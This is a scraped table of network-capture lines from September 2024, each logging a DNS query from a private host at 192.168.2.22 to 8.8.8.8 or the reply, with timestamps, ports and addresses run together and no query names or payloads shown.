                                                            Sep 25, 2024 08:32:02.713226080 CEST4969053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.720145941 CEST53496908.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.726887941 CEST4969053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.733927965 CEST53496908.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.738548994 CEST4969053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.745338917 CEST53496908.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.745811939 CEST4969053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.752152920 CEST53496908.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.879137993 CEST6016953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.891724110 CEST53601698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.913266897 CEST6016953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.920356035 CEST53601698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.921168089 CEST6016953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.928505898 CEST53601698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.933043957 CEST6016953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.940095901 CEST53601698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.941206932 CEST6016953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.947583914 CEST53601698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.060762882 CEST5306053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.067037106 CEST53530608.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.068185091 CEST5306053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.075498104 CEST53530608.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.076272964 CEST5306053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.083190918 CEST53530608.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.084140062 CEST5306053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.090878010 CEST53530608.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.091139078 CEST5306053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.098253965 CEST53530608.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.217261076 CEST4994953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.225990057 CEST53499498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.226346016 CEST4994953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.542067051 CEST53499498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.542273045 CEST4994953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.548547029 CEST53499498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.548674107 CEST4994953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.555062056 CEST53499498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:03.555229902 CEST4994953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:03.561553001 CEST53499498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:07.113037109 CEST5402753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:07.119626045 CEST53540278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:07.120022058 CEST5402753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:07.126554012 CEST53540278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:07.126919985 CEST5402753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:07.134107113 CEST53540278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:07.134341955 CEST5402753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:07.140420914 CEST53540278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:07.141197920 CEST5402753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:07.147452116 CEST53540278.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:10.947738886 CEST6395053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:10.954664946 CEST53639508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:10.955095053 CEST6395053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:10.962116957 CEST53639508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:10.962294102 CEST6395053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:10.969187021 CEST53639508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:10.969353914 CEST6395053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:10.977612972 CEST53639508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:10.977832079 CEST6395053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:10.984684944 CEST53639508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.069919109 CEST5825753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.152913094 CEST53582578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.153119087 CEST5825753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.159466028 CEST53582578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.159812927 CEST5825753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.166141987 CEST53582578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.166296005 CEST5825753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.173299074 CEST53582578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.173432112 CEST5825753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.179745913 CEST53582578.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.293781042 CEST5473853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.302731991 CEST53547388.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.303070068 CEST5473853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.309544086 CEST53547388.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.309731960 CEST5473853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.316831112 CEST53547388.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.317019939 CEST5473853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.324678898 CEST53547388.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.324862003 CEST5473853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.331218958 CEST53547388.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.456705093 CEST4947853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.463582993 CEST53494788.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.464051962 CEST4947853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.470997095 CEST53494788.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.471337080 CEST4947853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.477633953 CEST53494788.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.478084087 CEST4947853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.485182047 CEST53494788.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.485557079 CEST4947853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.492563963 CEST53494788.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.603153944 CEST4928853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.609383106 CEST53492888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.609623909 CEST4928853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.615711927 CEST53492888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.616060019 CEST4928853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.622242928 CEST53492888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.622440100 CEST4928853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.628499985 CEST53492888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.628719091 CEST4928853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.635391951 CEST53492888.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.743608952 CEST6159853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.750675917 CEST53615988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.750909090 CEST6159853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.757257938 CEST53615988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.757416964 CEST6159853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.763756990 CEST53615988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.764215946 CEST6159853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.772433043 CEST53615988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:14.772665977 CEST6159853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:14.779453039 CEST53615988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.787950993 CEST5875453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.800259113 CEST53587548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.800410986 CEST5875453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.806737900 CEST53587548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.806962013 CEST5875453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.813817024 CEST53587548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.813960075 CEST5875453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.820112944 CEST53587548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.820290089 CEST5875453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.827341080 CEST53587548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.944921017 CEST4922653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.951103926 CEST53492268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.951287031 CEST4922653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.957375050 CEST53492268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.957556009 CEST4922653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.963728905 CEST53492268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.963851929 CEST4922653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.969990969 CEST53492268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:18.970109940 CEST4922653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:18.976172924 CEST53492268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.079709053 CEST5469553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.086313963 CEST53546958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.086484909 CEST5469553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.092946053 CEST53546958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.093085051 CEST5469553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.100007057 CEST53546958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.100136995 CEST5469553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.106506109 CEST53546958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.106643915 CEST5469553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.113394976 CEST53546958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.220576048 CEST6160153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.227463007 CEST53616018.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.227626085 CEST6160153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.234241009 CEST53616018.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.234544039 CEST6160153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.240736961 CEST53616018.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.240993977 CEST6160153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.247112036 CEST53616018.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:19.247252941 CEST6160153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:19.253329992 CEST53616018.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.291148901 CEST5461553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.298108101 CEST53546158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.298451900 CEST5461553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.305363894 CEST53546158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.305572987 CEST5461553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.312843084 CEST53546158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.312978983 CEST5461553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.319901943 CEST53546158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.320132971 CEST5461553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.327411890 CEST53546158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.431181908 CEST5495053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.437834978 CEST53549508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.443203926 CEST5495053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.450294018 CEST53549508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.455250978 CEST5495053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.462610006 CEST53549508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.467176914 CEST5495053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.474165916 CEST53549508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.479182005 CEST5495053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.486046076 CEST53549508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.602196932 CEST6421553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.608963013 CEST53642158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.609621048 CEST6421553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.616558075 CEST53642158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.616894007 CEST6421553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.623662949 CEST53642158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.627548933 CEST6421553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.634543896 CEST53642158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:22.635545015 CEST6421553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:22.642575026 CEST53642158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:25.980634928 CEST5960453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:25.987591028 CEST53596048.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:25.987771034 CEST5960453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:25.994023085 CEST53596048.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:25.994189024 CEST5960453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.000605106 CEST53596048.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.000801086 CEST5960453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.008100033 CEST53596048.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.008234024 CEST5960453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.015296936 CEST53596048.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.129240036 CEST4952053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.136233091 CEST53495208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.136918068 CEST4952053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.143176079 CEST53495208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.143410921 CEST4952053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.149656057 CEST53495208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.149977922 CEST4952053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.156357050 CEST53495208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.156522036 CEST4952053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.162851095 CEST53495208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.268399000 CEST5303153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.274854898 CEST53530318.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.275146961 CEST5303153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.281420946 CEST53530318.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.281569958 CEST5303153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.287831068 CEST53530318.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.288022041 CEST5303153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.294395924 CEST53530318.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.294545889 CEST5303153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.300848007 CEST53530318.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.411201000 CEST5311253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.417781115 CEST53531128.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.419406891 CEST5311253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.426249027 CEST53531128.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.427403927 CEST5311253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.434673071 CEST53531128.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.435333967 CEST5311253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.441751957 CEST53531128.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.447406054 CEST5311253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.454410076 CEST53531128.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.574553013 CEST6508053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.581847906 CEST53650808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.582071066 CEST6508053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.588874102 CEST53650808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.589165926 CEST6508053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.596034050 CEST53650808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.596298933 CEST6508053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.603342056 CEST53650808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.607525110 CEST6508053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.614484072 CEST53650808.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.724204063 CEST5070253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.731420994 CEST53507028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.735377073 CEST5070253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.742613077 CEST53507028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.743266106 CEST5070253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.749587059 CEST53507028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.751333952 CEST5070253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.757750034 CEST53507028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.759345055 CEST5070253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.765750885 CEST53507028.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.888185978 CEST5308953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.894741058 CEST53530898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.912381887 CEST5308953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.918842077 CEST53530898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.919358969 CEST5308953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.925822020 CEST53530898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.927289963 CEST5308953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.933573961 CEST53530898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:26.933820963 CEST5308953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:26.940145016 CEST53530898.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:27.053258896 CEST5195153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:27.060422897 CEST53519518.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:27.061407089 CEST5195153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:27.067610979 CEST53519518.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:27.071317911 CEST5195153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:27.077462912 CEST53519518.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:27.079330921 CEST5195153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:27.086086988 CEST53519518.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:27.087426901 CEST5195153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:27.094543934 CEST53519518.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:27.231901884 CEST6154953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.199301958 CEST53615498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:28.199753046 CEST6154953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.206058979 CEST53615498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:28.206350088 CEST6154953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.213301897 CEST53615498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:28.214752913 CEST6154953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.221035957 CEST53615498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:28.221210003 CEST6154953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.227598906 CEST53615498.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:28.346057892 CEST5799853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.352952957 CEST53579988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:28.355149031 CEST5799853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.361490011 CEST53579988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:28.361634016 CEST5799853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.368117094 CEST53579988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:28.368485928 CEST5799853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.375343084 CEST53579988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:28.375503063 CEST5799853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:28.382504940 CEST53579988.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.158010960 CEST6243953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.164323092 CEST53624398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.165590048 CEST6243953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.172343016 CEST53624398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.173455000 CEST6243953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.180303097 CEST53624398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.181550980 CEST6243953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.187647104 CEST53624398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.189603090 CEST6243953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.195730925 CEST53624398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.307554960 CEST5943253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.314421892 CEST53594328.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.314703941 CEST5943253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.321702003 CEST53594328.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.323333025 CEST5943253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.329718113 CEST53594328.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.331459045 CEST5943253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.337730885 CEST53594328.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.339425087 CEST5943253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.346349001 CEST53594328.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.466495991 CEST5591053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.477886915 CEST53559108.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.478104115 CEST5591053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.485035896 CEST53559108.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.485200882 CEST5591053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.491569042 CEST53559108.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.491744995 CEST5591053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.498780966 CEST53559108.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:33.498956919 CEST5591053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:33.505963087 CEST53559108.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.284076929 CEST6156453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.291409969 CEST53615648.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.291898966 CEST6156453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.299030066 CEST53615648.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.299360991 CEST6156453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.305886030 CEST53615648.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.306359053 CEST6156453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.312669992 CEST53615648.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.313024998 CEST6156453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.320002079 CEST53615648.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.435250044 CEST5138453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.441792011 CEST53513848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.450331926 CEST5138453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.456697941 CEST53513848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.462219000 CEST5138453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.468628883 CEST53513848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.474226952 CEST5138453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.480832100 CEST53513848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.486182928 CEST5138453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.492522955 CEST53513848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.618233919 CEST5378553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.625154972 CEST53537858.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.630239010 CEST5378553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.636601925 CEST53537858.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.642226934 CEST5378553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.648902893 CEST53537858.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.651170015 CEST5378553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.658366919 CEST53537858.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:38.666224003 CEST5378553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:38.672419071 CEST53537858.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:43.524209023 CEST5527753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:43.530697107 CEST53552778.8.8.8192.168.2.22
